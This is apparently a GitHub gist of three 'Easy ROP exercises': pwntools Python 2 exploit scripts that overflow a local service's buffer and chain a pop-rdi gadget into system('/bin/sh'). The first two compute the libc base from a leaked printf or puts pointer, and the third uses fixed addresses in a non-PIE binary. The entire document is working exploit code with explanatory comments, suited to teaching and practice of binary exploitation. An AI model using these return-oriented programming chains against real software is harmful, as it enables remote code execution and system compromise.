@sudhackar
Last active February 19, 2018 06:20
Easy ROP exercises
from pwn import *
# Stage-1 exercise: a libc pointer leaked by the service is used to locate
# system() and a "/bin/sh" string, then a single pop-rdi gadget chains them.
# Python 2 script: raw_input() and the str + p64() concatenation below do not
# run unchanged under Python 3 (p64 returns bytes).
#
# Offsets inside ONE specific libc build. They are meaningless against any
# other build; nothing here derives them at runtime.
offset_system = 0x0000000000045390
offset_str_bin_sh = 0x18cd17
offset_printf = 0x0000000000055800
s = remote("127.0.0.1", 5000)
raw_input()  # pause before sending anything (e.g. to attach a debugger)
# The value printed after "random number: " is treated as a leaked printf
# address; subtracting its libc offset gives the libc load base.  The whole
# chain depends on this leak — a service that never echoes runtime addresses
# keeps ASLR effective against it.
s.recvuntil("random number: ")
x = s.recvline().strip()
printf_leak = int(x, 16)
libc_base = printf_leak - offset_printf
success(hex(libc_base))
s.recvuntil("> ")
# First write: 8 bytes of filler, then the chain pop rdi -> "/bin/sh" -> system.
payload_1 = "A"*8
payload_1 += p64(0x0000000000400723) # 0x0000000000400723 : pop rdi ; ret
payload_1 += p64(libc_base + offset_str_bin_sh)
payload_1 += p64(libc_base + offset_system)
s.sendline(payload_1)
s.recvuntil("> ")
# Second write: 40 bytes of filler, then a return into debug+16.
# NOTE(review): presumably the "sub rsp, 0xa8" there moves rsp back onto the
# first payload so its chain executes — confirm against the binary.
payload_2 = "B"*40
payload_2 += p64(0x4005f6) # 0x4005f6 <debug+16> sub rsp, 0xa8
s.sendline(payload_2)
s.interactive()
from pwn import *
# Stage-2 exercise: same idea as the first script, but the leaked pointer is
# puts and the overflow is a single large write (1352 bytes of filler).
# Python 2 script (raw_input(), str + p64() concatenation).
#
# Offsets inside ONE specific libc build; not derived at runtime.
offset_system = 0x0000000000045390
offset_str_bin_sh = 0x18cd17
offset_puts = 0x000000000006f690
s = remote("127.0.0.1", 5000)
raw_input()  # pause before sending anything (e.g. to attach a debugger)
# The hex value printed after the banner is treated as a leaked puts address
# and used to recover the libc base.  Without this leak the hard-coded
# offsets alone would not defeat ASLR.
s.recvuntil("It's dangerous to go alone! Take this, ")
x = s.recvline().strip()
puts_leak = int(x, 16)
libc_base = puts_leak - offset_puts
success(hex(libc_base))
# Filler up to the saved return address, then pop rdi -> "/bin/sh" -> system.
payload = "A"*1352
payload += p64(0x0000000000400713) # 0x0000000000400713 : pop rdi ; ret
payload += p64(libc_base+offset_str_bin_sh)
payload += p64(libc_base+offset_system)
s.recvuntil(": ")
s.sendline(payload)
s.interactive()
from pwn import *
# Stage-3 exercise: no leak is needed here — every address is inside the
# (non-PIE) binary itself: the gadget, the "/bin/bash" string, and the
# existing call to system.  Position-independent builds (PIE) are the
# mitigation that would invalidate these fixed addresses.
# Python 2 script (str + p64() concatenation).
payload = "A"*136
payload += p64(0x0000000000400713)# 0x0000000000400713 : pop rdi ; ret
payload += p64(0x0000000000400738)# 0x0000000000400738 : db '/bin/bash',0
payload += p64(0x000000000040064F)# 0x000000000040064F : call _system
s = remote("127.0.0.1", 5000)
s.sendline(payload)  # sent immediately; nothing is read from the service first
s.interactive()